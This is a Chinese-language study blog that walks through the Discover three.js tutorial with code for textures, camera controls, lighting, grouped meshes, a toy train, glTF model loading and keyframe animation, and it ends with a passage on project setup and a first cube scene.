    给立方体贴图:

    立方体贴图

    修改 components/cube.js

    • 定义 createMaterial(),将控制物体材质的代码移到另一个函数中。
      • const textureLoader = new TextureLoader(); 定义一个加载纹理贴图的类。
      • const texture = textureLoader.load('./assets/textures/uv-test-bw.png',); 加载贴图,使其转换成能材质类读取的形式。
      • const material = new MeshStandardMaterial({map: texture,}); 定义材质。
    import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils, TextureLoader } from 'three';

    function createMaterial() {
    // create a texture loader.
    const textureLoader = new TextureLoader();
    // load a texture
    const texture = textureLoader.load(
    './assets/textures/uv-test-bw.png',
    );
    // create a "standard" material using
    // the texture we just loaded as a color map
    const material = new MeshStandardMaterial({
    map: texture,
    });

    return material;
    }

    function createCube() {
    // create a geometry
    const geometry = new BoxGeometry(2, 2, 2);

    // create a default (white) Basic material
    const material = createMaterial();

    // create a Mesh containing the geometry and material
    const cube = new Mesh(geometry, material);

    cube.rotation.set(-0.5, -0.1, 0.8);

    const radiansPerSecond = MathUtils.degToRad(30);
    // this method will be called once per frame
    cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
    };

    return cube;
    }

    export { createCube };

    演示

    1.9 使用相机控制插件扩展 three.js

    本节将使用新插件:three/examples/jsm/controls/OrbitControls.js

    OrbitControls 是 Three.js 库中的一个辅助控制器,允许用户通过鼠标操作来旋转、缩放和平移场景中的相机,从而实现对场景的交互式查看。

    新插件!

    如果是本地加载的,还要修改一下 OrbitControls.js 里的导入逻辑:

    import {
    EventDispatcher,
    MOUSE,
    Quaternion,
    Spherical,
    TOUCH,
    Vector2,
    Vector3,
    Plane,
    Ray,
    MathUtils
    } from '../../../build/three.module.js';
    • const controls = new OrbitControls(camera, canvas);:通过传入相机(camera)和 canvas 元素(canvas),创建了一个新的 OrbitControls 实例。
    • controls.enableDamping = true;:启用阻尼效果(惯性),使相机移动更加平滑自然。阻尼效果需要在动画循环中不断更新控制器状态。
    • controls.tick = () => controls.update();:在控制器上添加了一个名为tick的方法,这个方法简单地调用了controls.update()。这是因为当启用阻尼或自动旋转时,需要在每一帧更新控制器的状态以获得平滑的动画效果。在主动画循环中调用此tick方法可以达到这个目的。
    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';

    function createControls(camera, canvas) {
    const controls = new OrbitControls(camera, canvas);

    // damping and auto rotation require
    // the controls to be updated each frame

    // this.controls.autoRotate = true;
    controls.enableDamping = true;

    controls.tick = () => controls.update();

    return controls;
    }

    export { createControls };
    • import { createControls } from './systems/controls.js'; 导入 controls.js
    • const controls = createControls(camera, renderer.domElement); 将参数传给 createControls() 以激活辅助控制器。
    • loop.updatables.push(controls); 使得场景能够更新。
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    演示

    按需渲染

    如果只使用相机控制插件,而不使用任何动画,那么使用按需渲染可以节约资源。

    • controls.addEventListener('change', () => {renderer.render(scene, camera);}); 设置事件监听,当用户控制相机时,重新渲染画面(而不是循环渲染画面)。
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    // import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    // let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    // loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    controls.addEventListener('change', () => {
    renderer.render(scene, camera);
    });

    const cube = createCube();
    const light = createLights();

    // loop.updatables.push(controls);

    // stop the cube's animation
    // loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    // start() {
    // loop.start();
    // }

    // stop() {
    // loop.stop();
    // }
    }

    export { World };

    取消动画循环:

    import { World } from './World/World.js';

    function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // draw the scene
    world.render();
    }

    main();

    演示

    OrbitControls 配置

    可以通过设置参数以配置 OrbitControls 的功能:使用相机控制插件扩展 three.js | Discover three.js (discoverthreejs.com)

    1.10 环境光:来自各个方向的光照

    之前的立方体背面完全是黑色,这是因为缺少环境光。

    AmbientLight是在 three.js 中伪造间接照明的最廉价的方法。这种类型的光会从各个方向向场景中的每个对象添加恒定数量的光照。

    • const ambientLight = new AmbientLight('white', 2);

    来自 HemisphereLight的光在场景顶部的天空颜色和场景底部的地面颜色之间渐变。与AmbientLight一样,此灯不尝试物理精度。相反,HemisphereLight是在观察到在您发现人类的许多情况下创建的,最亮的光来自场景的顶部,而来自地面的光通常不太亮。

    • const ambientLight = new HemisphereLight('white', 'darkslategrey', 5, ); 创建一个 HemisphereLight 作为环境光
      • 天空颜色:white
      • 地面颜色:darkslategrey
      • 强度:5
    • return { ambientLight, mainLight }; 返回场景光与主光源。
    import { AmbientLight, DirectionalLight, HemisphereLight } from 'three';

    function createLights() {
    const ambientLight = new HemisphereLight(
    'white', // bright sky color
    'darkslategrey', // dim ground color
    5, // intensity
    );

    const mainLight = new DirectionalLight('white', 5);
    mainLight.position.set(10, 10, 10);

    return { ambientLight, mainLight };
    }

    export { createLights };
    • const { ambientLight, mainLight } = createLights();:获取函数返回的光源对象。(是否可以修改成列表以减少耦合性?)
    • scene.add(ambientLight, mainLight, cube);:将这些光源和立方体对象加入场景。
    import { createCamera } from './components/camera.js';
    import { createCube } from './components/cube.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);

    const cube = createCube();
    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight, cube);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    // draw a single frame
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    演示

    1.11 组织你的场景

    源教程使用的是 SphereBufferGeometry 在我这里似乎已经过期,应该改成 SphereGeometry。(用于创建球体形状的几何体)

    • const group = new Group(); 使用 Group 类创建一个新的组合对象 group。这个组合将用来容纳所有的球体,但它自身是不可见的。

    • const geometry = new SphereGeometry(0.25, 16, 16); 使用 Group 类创建一个新的组合对象 group。这个组合将用来容纳所有的球体,但它自身是不可见的。(就是个空节点)

    • group.add(protoSphere); 将这个 const protoSphere = new Mesh(geometry, material); 作为 group 的子对象。

    • for (let i = 0; i < 1; i += 0.05) {}:创建更多球体。

      • const sphere = protoSphere.clone(); 克隆球体 protoSphere,克隆的对象将具有与原始对象相同的位置、旋转和缩放。

        几何体和材质不是克隆的,它们是共享的。如果我们对共享材质进行任何更改,例如,更改其颜色,所有克隆的网格将与原始网格一起更改。如果您对几何体进行任何更改,这同样适用。(这跟 Unity 也可像)

        您可以给一个克隆一个全新的材料,而原来的材料不会受到影响。

      • 变换新的几何体的 transform

      • group.add(sphere); 将最后得到的几何体加入 group 中。

    • group.scale.multiplyScalar(2);:将整个组合的大小放大两倍。


    • const radiansPerSecond = MathUtils.degToRad(30); 尝试将整个 group 每秒旋转 $30^\circ$。
    • group.tick = (delta) => {group.rotation.z -= delta * radiansPerSecond;};:应用动画。
    import {
    SphereGeometry,
    Group,
    MathUtils,
    Mesh,
    MeshStandardMaterial,
    } from 'three';

    function createMeshGroup() {
    // a group holds other objects
    // but cannot be seen itself
    const group = new Group();

    const geometry = new SphereGeometry(0.25, 16, 16);

    const material = new MeshStandardMaterial({
    color: 'indigo',
    });

    const protoSphere = new Mesh(geometry, material);

    // add the protoSphere to the group
    group.add(protoSphere);

    // create twenty clones of the protoSphere
    // and add each to the group
    for (let i = 0; i < 1; i += 0.05) {
    const sphere = protoSphere.clone();

    // position the spheres on around a circle
    sphere.position.x = Math.cos(2 * Math.PI * i);
    sphere.position.y = Math.sin(2 * Math.PI * i);

    sphere.scale.multiplyScalar(0.01 + i);

    group.add(sphere);
    }

    // every sphere inside the group will be scaled
    group.scale.multiplyScalar(2);

    const radiansPerSecond = MathUtils.degToRad(30);

    // each frame, rotate the entire group of spheres
    group.tick = (delta) => {
    group.rotation.z -= delta * radiansPerSecond;
    };

    return group;
    }

    export { createMeshGroup };

    把之前的 cube 换成了 meshGroup

    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createMeshGroup } from './components/meshGroup.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const meshGroup = createMeshGroup();

    loop.updatables.push(controls, meshGroup);
    scene.add(ambientLight, mainLight, meshGroup);

    const resizer = new Resizer(container, camera, renderer);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    演示

    1.12 使用内置几何体获得创意

    文件组织结构如下:

    • components/Train/:创建一个火车类
      • Train.js:组装火车,并设置轮子移动动画。
      • geometries.js:定义构成火车的组件。
      • materials.js:定义火车的材质。
      • meshes.js:设置火车的组建的 transform。
    • components/helpers.js:在场景中显示坐标系。

    文件结构

    • import {createAxesHelper, createGridHelper,} from './components/helpers.js';import { Train } from './components/Train/Train.js';:导入相关库。
    • const train = new Train();loop.updatables.push(controls, train);scene.add(ambientLight, mainLight, train);:定义火车类,加载动画并放置在场景中。
    • scene.add(createAxesHelper(), createGridHelper());:在场景中显示坐标轴。
    import { createCamera } from './components/camera.js';
    import {
    createAxesHelper,
    createGridHelper,
    } from './components/helpers.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';
    import { Train } from './components/Train/Train.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const controls = createControls(camera, renderer.domElement);
    const { ambientLight, mainLight } = createLights();
    const train = new Train();

    loop.updatables.push(controls, train);
    scene.add(ambientLight, mainLight, train);

    const resizer = new Resizer(container, camera, renderer);

    scene.add(createAxesHelper(), createGridHelper());
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };
    • function createAxesHelper() {}:创建坐标轴。
      • const helper = new AxesHelper(3);:显示的坐标轴长度为 $3$。
      • helper.position.set(-3.5, 0, -3.5);:将坐标轴放置在 $(-3.5, 0, -3.5)$ 的位置。
    • function createGridHelper() {}:创建网格。
      • const helper = new GridHelper(6);:在 $xOz$ 平面创建 $6 \times 6$ 的网格,大小为 $1$。
    import { AxesHelper, GridHelper } from 'three';

    function createAxesHelper() {
    const helper = new AxesHelper(3);
    helper.position.set(-3.5, 0, -3.5);
    return helper;
    }

    function createGridHelper() {
    const helper = new GridHelper(6);
    return helper;
    }

    export { createAxesHelper, createGridHelper };

    • ./meshes.js 导入 createMeshes,将这些 meshes 放在自己节点下。
    • tick(delta) {} 让车轮以每秒 $24^\circ$ 的速度旋转。
    import { Group, MathUtils } from 'three';

    import { createMeshes } from './meshes.js';

    const wheelSpeed = MathUtils.degToRad(24);

    class Train extends Group {
    constructor() {
    super();

    this.meshes = createMeshes();

    this.add(
    this.meshes.nose,
    this.meshes.cabin,
    this.meshes.chimney,
    this.meshes.smallWheelRear,
    this.meshes.smallWheelCenter,
    this.meshes.smallWheelFront,
    this.meshes.bigWheel,
    );
    }

    tick(delta) {
    this.meshes.bigWheel.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelRear.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelCenter.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelFront.rotation.y += wheelSpeed * delta;
    }
    }

    export { Train };

    原教程使用的是 BoxGeometryCylinderBufferGeometry,这似乎已弃用,应分别改为 BoxGeometry,CylinderGeometry

    • const cabin = new BoxGeometry(2, 2.25, 1.5);:创建一个立方体几何体,参数2, 2.25, 1.5分别对应立方体的宽度、高度和深度。
    • const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16);:创建一个圆柱形几何体。
      • 第一个和第二个参数0.75, 0.75分别是圆柱的顶部半径和底部半径。
      • 第三个参数3是圆柱的高度。
      • 第四个参数12定义了圆柱周围的面数,更高的值会使圆柱看起来更加圆滑。
      • const chimney = new CylinderGeometry(0.3, 0.1, 0.5); 同理。
    import { BoxGeometry, CylinderGeometry } from 'three';

    function createGeometries() {
    const cabin = new BoxGeometry(2, 2.25, 1.5);

    const nose = new CylinderGeometry(0.75, 0.75, 3, 12);

    // we can reuse a single cylinder geometry for all 4 wheels
    const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16);

    // different values for the top and bottom radius creates a cone shape
    const chimney = new CylinderGeometry(0.3, 0.1, 0.5);

    return {
    cabin,
    nose,
    wheel,
    chimney,
    };
    }

    export { createGeometries };
    • new MeshStandardMaterial({}); 创建一个标准材质。
      • flatShading: true,:开启平滑着色。
    import { MeshStandardMaterial } from 'three';

    function createMaterials() {
    const body = new MeshStandardMaterial({
    color: 'firebrick',
    flatShading: true,
    });

    const detail = new MeshStandardMaterial({
    color: 'darkslategray',
    flatShading: true,
    });

    return { body, detail };
    }

    export { createMaterials };
    • function createMeshes() {}:根据 import { createGeometries } from './geometries.js';import { createMaterials } from './materials.js';,调整各组件的 transform,组装成小火车。
    import { Mesh } from 'three';

    import { createGeometries } from './geometries.js';
    import { createMaterials } from './materials.js';

    function createMeshes() {
    const geometries = createGeometries();
    const materials = createMaterials();

    const cabin = new Mesh(geometries.cabin, materials.body);
    cabin.position.set(1.5, 1.4, 0);

    const chimney = new Mesh(geometries.chimney, materials.detail);
    chimney.position.set(-2, 1.9, 0);

    const nose = new Mesh(geometries.nose, materials.body);
    nose.position.set(-1, 1, 0);
    nose.rotation.z = Math.PI / 2;

    const smallWheelRear = new Mesh(geometries.wheel, materials.detail);
    smallWheelRear.position.y = 0.5;
    smallWheelRear.rotation.x = Math.PI / 2;

    const smallWheelCenter = smallWheelRear.clone();
    smallWheelCenter.position.x = -1;

    const smallWheelFront = smallWheelRear.clone();
    smallWheelFront.position.x = -2;

    const bigWheel = smallWheelRear.clone();
    bigWheel.position.set(1.5, 0.9, 0);
    bigWheel.scale.set(2, 1.25, 2);

    return {
    nose,
    cabin,
    chimney,
    smallWheelRear,
    smallWheelCenter,
    smallWheelFront,
    bigWheel,
    };
    }

    export { createMeshes };

    演示

    1.13 以 glTF 格式加载 3D 模型

    在过去三十年左右的时间里,人们在创建标准 3D 资源交换格式方面进行了许多尝试。直到最近,FBXOBJ (Wavefront)DAE (Collada) 格式仍然是其中最受欢迎的格式,尽管它们都存在阻碍其广泛采用的问题。比如 OBJ 不支持动画,FBX 是属于 Autodesk 的封闭格式,Collada 规范过于复杂,导致大文件难以加载。

    然而,最近,一个名为 glTF 的新成员已成为在网络上交换 3D 资源的事实上的标准格式。glTFGL 传输格式),有时被称为 3D 中的 JPEG,由 Kronos Group 创建,他们负责 WebGL、OpenGL 和一大堆其他图形 API。glTF 最初于 2017 年发布,现在是在网络和许多其他领域交换 3D 资源的最佳格式。在本书中,我们将始终使用 glTF,如果可能,您也应该这样做。它专为在网络上共享模型而设计,因此文件大小尽可能小,并且您的模型将快速加载。

    但是,由于 glTF 相对较新,您最喜欢的应用程序可能还没有导出器。在这种情况下,您可以在使用模型之前将它们转换为 glTF,或者使用其他加载器,例如 FBXLoaderor 或者 OBJLoader。所有 three.js 加载器的工作方式相同,因此如果您确实需要使用另一个加载器,本章中的所有内容仍然适用,只有细微差别。

    原文极力推荐 .glb 格式,好吧,依他。

    Loader

    可以看到 three.js 支持好多种格式的文件,我们使用 GLTFLoader.js,它还需要依赖项 '../utils/BufferGeometryUtils.js'

    如果是本地加载,还应修改其相对地址:

    import {XXX} from '../../../build/three.module.js';

    文件组织结构如下:

    • assets/models:存放着 3D 模型(.glb 格式)。
    • src/World/components/birds/
      • birds.js:导入模型,创建鸟对象。
      • setupModel.js:处理加载的数据。

    文件结构

    • await world.init();:等待模型加载完毕,才开始渲染。
    import { World } from './World/World.js';

    async function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // complete async tasks
    await world.init();

    // start the animation loop
    world.start();
    }

    main().catch((err) => {
    console.error(err);
    });
    • async init() {}:等待模型加载完毕,才开始渲染。
      • const { parrot, flamingo, stork } = await loadBirds(); 异步加载模型。
      • controls.target.copy(parrot.position);:将场景控制的目标位置设置为 parrot 模型的位置。这通常用于确保相机能够围绕指定的点进行旋转或焦点对准,从而使用户的视角集中在这个点上。
      • scene.add(parrot, flamingo, stork); 将三只鸟加入场景。
    import { loadBirds } from './components/birds/birds.js';
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let controls;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
    }

    async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    scene.add(parrot, flamingo, stork);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    火烈鸟

    Blender 打开这个 .glb 模型,可以看到 Mesh_0 节点在 Object_0 下面,我们只需要 Mesh_0 这个节点,把它选取出来:

    function setupModel(data) {
    const model = data.scene.children[0];

    return model;
    }

    export { setupModel };
    • async function loadBirds() {}:异步加载。

      • const loader = new GLTFLoader();:使得程序具有加载 .glb 文件的能力。

      • const [parrotData, flamingoData, storkData] = await Promise.all([...]);:异步加载模型。

      • const parrot = setupModel(parrotData);:生成 parrot 对象。

      • parrot.position.set(0, 0, 2.5);:设置对象位置。

    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

    import { setupModel } from './setupModel.js';

    async function loadBirds() {
    const loader = new GLTFLoader();

    const [parrotData, flamingoData, storkData] = await Promise.all([
    loader.loadAsync('assets/models/Parrot.glb'),
    loader.loadAsync('assets/models/Flamingo.glb'),
    loader.loadAsync('assets/models/Stork.glb'),
    ]);

    console.log('Squaaawk!', parrotData);

    const parrot = setupModel(parrotData);
    parrot.position.set(0, 0, 2.5);

    const flamingo = setupModel(flamingoData);
    flamingo.position.set(7.5, 0, -10);

    const stork = setupModel(storkData);
    stork.position.set(0, -2.5, -10);

    return {
    parrot,
    flamingo,
    stork,
    };
    }

    export { loadBirds };

    演示

    试试自己的模型:

    blender 把自己之前创建的模型导出成 .glb 格式:

    戴珍珠耳环的女孩

    代码就照葫芦画瓢了!

    演示

    1.14 three.js 动画系统

    创建动画涉及三个元素:关键帧、KeyframeTrackAnimationClip

    动画系统中最底层的概念级别是关键帧。每个关键帧由三部分信息组成:时间 time、属性 property 和值 value

    没有代表单个关键帧的类。相反,关键帧是存储在两个数组中的原始数据时间,在 KeyframeTrack中。

    创建一个代表不透明度的数字关键帧轨迹,包含五个关键帧

    import { NumberKeyframeTrack } from "three";

    const times = [0, 1, 2, 3, 4];
    const values = [0, 1, 0, 1, 0];

    const opacityKF = new NumberKeyframeTrack(".material.opacity", times, values);

    创建一个表示位置的矢量关键帧轨迹,包含三个关键帧

    import { VectorKeyframeTrack } from "three";

    const times = [0, 3, 6];
    const values = [0, 0, 0, 2, 2, 2, 0, 0, 0];

    const positionKF = new VectorKeyframeTrack(".position", times, values);

    动画剪辑是附加到单个对象的任意数量的关键帧的集合,表示剪辑的类是 AnimationClip

    动画位置和不透明度的剪辑

    import { AnimationClip, NumberKeyframeTrack, VectorKeyframeTrack } from "three";

    const positionKF = new VectorKeyframeTrack(
    ".position",
    [0, 3, 6],
    [0, 0, 0, 2, 2, 2, 0, 0, 0]
    );

    const opacityKF = new NumberKeyframeTrack(
    ".material.opacity",
    [0, 1, 2, 3, 4, 5, 6],
    [0, 1, 0, 1, 0, 1, 0]
    );

    const moveBlinkClip = new AnimationClip("move-n-blink", -1, [
    positionKF,
    opacityKF,
    ]);

    • loop.updatables.push(parrot, flamingo, stork);:将 parrotflamingostork 加入 Loop 中以播放动画。
    import { loadBirds } from './components/birds/birds.js';
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let controls;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
    }

    async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    loop.updatables.push(parrot, flamingo, stork);
    scene.add(parrot, flamingo, stork);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };
    • const clip = data.animations[0];:获取 data 中的第一个动画(animations[0]),存储在变量 clip 中。
    • const mixer = new AnimationMixer(model);:使用刚刚获取的模型(model)创建一个AnimationMixer实例。这个实例将用于管理模型的动画。
    • const action = mixer.clipAction(clip);:使用 mixer.clipAction(clip) 创建一个针对特定动画片段(clip)的动画操作(action)。
    • action.play();:开始播放这个动画。
    • model.tick = (delta) => mixer.update(delta);:更新动画。
    import { AnimationMixer } from 'three';

    function setupModel(data) {
    const model = data.scene.children[0];
    const clip = data.animations[0];

    const mixer = new AnimationMixer(model);
    const action = mixer.clipAction(clip);
    action.play();

    model.tick = (delta) => mixer.update(delta);

    return model;
    }

    export { setupModel };

    演示

    ]]>
    + 资源

    0

    0.4 GitHub 上的 three.js - 魔法出现的地方

    mrdoob/three.js: JavaScript 3D Library. (github.com) 中:

    • build/three.module.js 是运行所需的文件。
    • examples/ 代码示例。
    • src/ 源代码。

    0.5 如何在你的项目中引入 three.js

    在项目文件夹中,初始化 npm:

    1
    npm init

    安装 three.js:

    1
    npm install --save three

    导入:

    1
    import {XXX, XXX, XXX} from 'three/build/three.module.js';

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js

    要引入的话,直接:

    1
    <script type="module" src="three.module.js"></script>

    1-入门:真正的乐趣从这里开始!

    1.1 Three.js 应用的结构

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>

    <link href="./styles/main.css" rel="stylesheet" type="text/css">

    <body>
    <div id="scene-container">
    <!-- Our <canvas> will be inserted here -->
    </div>
    </body>

    <script type="module" src="./src/main.js"></script>

    </html>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    body {
    /* remove margins and scroll bars */
    margin: 0;
    overflow: hidden;

    /* style text */
    text-align: center;
    font-size: 12px;
    font-family: Sans-Serif;

    /* color text */
    color: #444;
    }

    h1 {
    /* position the heading */
    position: absolute;
    width: 100%;

    /* make sure that the heading is drawn on top */
    z-index: 1;
    }

    #scene-container {
    /* tell our scene container to take up the full page */
    position: absolute;
    width: 100%;
    height: 100%;

    /* Set the container's background color to the same as the scene's background to prevent flashing on load */
    background-color: skyblue;
    }

    npm 方式导入:

    1
    2
    3
    4
    5
    6
    7
    8
    import {
    Camera,
    Group,
    Scene,
    } from 'three';

    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';
    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

    cdn 方式导入:

    1
    2
    3
    import { Camera, Group, Scene } from "https://cdn.skypack.dev/three@0.132.2";
    import { OrbitControls } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/controls/OrbitControls.js?module";
    import { GLTFLoader } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/loaders/GLTFLoader.js?module";

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js,放在vendor/three/build/ 下,本地导入:

    1
    2
    3
    4
    5
    6
    7
    // 导入 Three.js 模块
    import {
    XXX,
    XXX
    } from '../vendor/three/build/three.module.js';

    ...自由操作...

    放置其他人编写的 JS 文件的地方。

    使用的任何非 HTML、CSS 或 JavaScript 的东西都在这里:纹理、3D 模型、字体、声音等等。

    1.2 你的第一个 three.js 场景:你好,立方体!

    编写 main.js

    • 导入模块:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 导入 Three.js 模块
    import {
    Scene,
    PerspectiveCamera,
    WebGLRenderer,
    BoxGeometry,
    MeshBasicMaterial,
    Mesh,
    Color
    } from '../vendor/three/build/three.module.js';
    • 获取画布所在容器:
    1
    const container = document.querySelector('#scene-container');
    • 创建一个新的场景:
    1
    const scene = new Scene();
    • 设置背景为天蓝色:
    1
    scene.background = new Color('skyblue');
    • 定义一个透视相机:
      • fov:视野范围
      • aspect:摄影机宽高比(容器的宽高比)
      • near:近裁剪面的距离。只有在这个距离之后的物体才会被摄像机捕捉到,太近的物体会被忽略。这个值应该设置为正数,并且尽可能小以避免裁剪近处的重要细节,但过小的值可能会导致深度缓冲问题。
      • far:远裁剪面的距离。任何在这个距离之外的物体都不会被摄像机捕捉到。这个值决定了摄像机可以看到多远的场景,设置得过大可能会影响渲染性能和深度缓冲的精度。
    • 定义好后,放在场景的 $(0, 0, 10)$ 处。
    1
    2
    3
    4
    5
    6
    7
    const fov = 35; // AKA Field of View
    const aspect = container.clientWidth / container.clientHeight;
    const near = 0.1; // the near clipping plane
    const far = 100; // the far clipping plane

    const camera = new PerspectiveCamera(fov, aspect, near, far);
    camera.position.set(0, 0, 10);
    • 定义一个立方体网格,尺寸设为 $(2, 2, 2)$:
    1
    2
    // 注意这里使用的是 BoxGeometry
    const geometry = new BoxGeometry(2, 2, 2);
    • 定义材质:
    1
    const material = new MeshBasicMaterial({ color: 0x44aa88 });
    • 一个 Mesh 对象——由网格和材质组成:
    1
    const cube = new Mesh(geometry, material);
    • 往场景中添加这个立方体:
    1
    scene.add(cube);
    • 接下来是渲染操作:

      • const renderer = new WebGLRenderer();:创建了一个新的 WebGLRenderer 实例。

        WebGLRenderer 是 Three.js 中用于在网页上渲染 3D 图形的渲染器。它使用 WebGL API 来绘制场景和模型。默认情况下,这个渲染器会创建一个 <canvas> 元素,用于显示渲染的 3D 图形。

        • renderer.setSize(container.clientWidth, container.clientHeight);:使用setSize方法设置渲染器的大小,以适应容器(通常是某个 HTML 元素)的尺寸。

          container.clientWidthcontainer.clientHeight 分别获取容器的宽度和高度,确保渲染的 3D 场景能够充满整个容器,不会出现拉伸或压缩的情况。

        • renderer.setPixelRatio(window.devicePixelRatio);

          通过 setPixelRatio 方法设置渲染器的像素比,使用 window.devicePixelRatio 来适配不同设备的屏幕分辨率。这样可以确保在具有高像素密度的显示屏(如 Retina 屏幕)上也能获得清晰的渲染效果。

        • container.appendChild(renderer.domElement);

